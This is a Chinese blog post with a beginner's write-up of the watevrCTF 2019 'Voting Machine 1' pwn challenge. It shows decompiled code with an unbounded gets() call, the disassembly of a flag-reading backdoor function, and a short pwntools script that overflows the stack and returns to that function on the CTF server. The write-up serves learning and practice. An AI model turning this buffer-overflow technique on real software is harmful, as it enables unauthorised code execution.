news 2026/2/28 9:35:18

[watevrCTF 2019]Voting Machine 1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[watevrCTF 2019]Voting Machine 1

第一次打CTF——PWN篇学习笔记12

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE v4[2]; // [rsp+Eh] [rbp-2h] BYREF ​ signal(14, sig); alarm(0x28u); puts("Hello and welcome to \x1B[3mour\x1B[23m voting application!"); puts("Today's vote will be regarding the administration of"); puts("watevr CTF."); puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible."); puts("Thanks!"); printf("Vote: "); fflush(_bss_start); gets(v4); puts("Thanks for voting!"); return 0; }

发现gets函数,明显的栈溢出,查看字符串发现/home/ctf/flag.txt,点击进入后门函数

void __noreturn super_secret_function() { FILE *stream; // [rsp+0h] [rbp-10h] char i; // [rsp+Fh] [rbp-1h] ​ stream = fopen("/home/ctf/flag.txt", "r"); if ( !stream ) { puts("Cannot open flag.txt"); exit(1); } for ( i = fgetc(stream); i != -1; i = fgetc(stream) ) putchar(i); fclose(stream); exit(0); }
.text:0000000000400807 super_secret_function proc near .text:0000000000400807 .text:0000000000400807 stream = qword ptr -10h .text:0000000000400807 var_1 = byte ptr -1 .text:0000000000400807 .text:0000000000400807 ; __unwind { .text:0000000000400807 push rbp .text:0000000000400808 mov rbp, rsp .text:000000000040080B sub rsp, 10h .text:000000000040080F lea rsi, modes ; "r" .text:0000000000400816 lea rdi, filename ; "/home/ctf/flag.txt" .text:000000000040081D call _fopen .text:0000000000400822 mov [rbp+stream], rax .text:0000000000400826 cmp [rbp+stream], 0 .text:000000000040082B jnz short loc_400843 .text:000000000040082D lea rdi, s ; "Cannot open flag.txt" .text:0000000000400834 call _puts .text:0000000000400839 mov edi, 1 ; status .text:000000000040083E call _exit

取地址0x400808,据此编写脚本,成功获得flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",21930) ​ backdoor = 0x400808 ​ payload = cyclic(0x2 + 8) + p64(backdoor) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/25 11:02:21

npm audit检查Qwen-Image-Edit-2509依赖安全性

npm audit 检查 Qwen-Image-Edit-2509 依赖安全性 在现代 AI 应用快速落地的背景下,一个看似“纯粹”的图像编辑模型早已不再是孤立的算法黑盒。以 Qwen-Image-Edit-2509 为例,它虽然核心是基于 Python 的多模态扩散模型,但在实际部署中&…

作者头像 李华
网站建设 2026/2/22 23:57:45

为什么Qwen3-VL-8B是轻量级多模态入门首选?

为什么Qwen3-VL-8B是轻量级多模态入门首选? 在电商商品页自动生成图文描述、客服系统“拍照提问”即时响应、教育平台自动解析习题图片的背后,隐藏着一个共同的技术核心:多模态大模型。这些能够“看图说话”的AI系统,正从实验室走…

作者头像 李华
网站建设 2026/2/27 17:15:19

计算机Java毕设实战-基于springboot古风生活体验交流网站的设计与实现【完整源码+LW+部署说明+演示视频,全bao一条龙等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/2/10 10:56:57

花5分钟判断,你的Jmeter技能是大佬还是小白!

jmeter 这个工具既可以做接口的功能测试,也可以做自动化测试,还可以做性能测试,其主要用途就是用于性能测试。但是,有些公司和个人,就想用 jmeter 来做接口自动化测试。 你有没有想过呢? 下面我就给大家讲…

作者头像 李华
网站建设 2026/2/27 21:33:22

Transformer模型压缩技术在Qwen-Image上的应用前景

Transformer模型压缩技术在Qwen-Image上的应用前景 在生成式AI迅速渗透内容创作领域的今天,图像生成模型正面临一场关键的“落地挑战”:如何在不牺牲质量的前提下,把动辄上百GB显存需求、延迟高达数秒的庞然大物,塞进一张消费级显…

作者头像 李华
网站建设 2026/2/11 0:41:57

HuggingFace镜像网站上线Qwen-Image,支持高分辨率图像生成

HuggingFace镜像网站上线Qwen-Image,支持高分辨率图像生成 在AIGC(生成式人工智能)浪潮席卷内容创作领域的今天,一个现实问题始终困扰着设计师和开发者:如何让AI真正理解复杂、细腻的中文语义,并输出可用于…

作者头像 李华